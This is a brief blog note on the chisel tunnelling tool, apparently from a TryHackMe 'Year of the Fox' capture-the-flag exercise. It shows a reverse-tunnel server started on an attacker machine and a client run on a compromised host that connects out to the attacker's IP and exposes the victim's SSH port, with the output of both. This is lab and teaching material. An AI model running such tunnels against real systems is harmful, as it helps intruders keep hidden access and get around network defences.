Skip to main content

chisel: Notes

chisel - Source: https://github.com/jpillora/chisel

Chisel on GitHub: https://github.com/jpillora/chisel

Chisel is written in Go.

Start chisel server on kali attack machine

root@X220:~# ./chisel server -p 8000 --reverse
2021/04/14 18:45:55 server: Reverse tunnelling enabled
2021/04/14 18:45:55 server: Fingerprint KL0WyhmdH+DdiSiBnHkqRFZ9AC7azAWqL+NBQ1pAmdM=
2021/04/14 18:45:55 server: Listening on http://0.0.0.0:8000

Run chisel client on victim machine to connect and create tunnel on port 22

www-data@year-of-the-fox:/tmp$ ./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
<./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
2021/04/14 12:51:33 client: Connecting to ws://10.8.146.172:8000
2021/04/14 12:51:35 client: Connected (Latency 228.164693ms)

Practice

>>> THM | Year of the Fox

Popular posts from this blog

Powershell: Remove-Item

Use Remove-Item to delete files, folders, and more than that

DrayTek VigorAP 910C as Universal Repeater

3 steps to extend wi-fi coverage using DrayTek VigorAP 910C Set Operation Mode to Universal Repeater mode VigorAP 910C: Set Operation Mode Configuration to Universal Repeater Connect DrayTek VigorAP 910C to existing Wi-Fi Access Point Connect DrayTek VigorAP 910C to existing Wi-Fi Access Point Set Security Mode & Pass Phrase for DrayTek VigorAP 910C Set Security Mode & Pass Phrase for DrayTek VigorAP 910C Check Online Status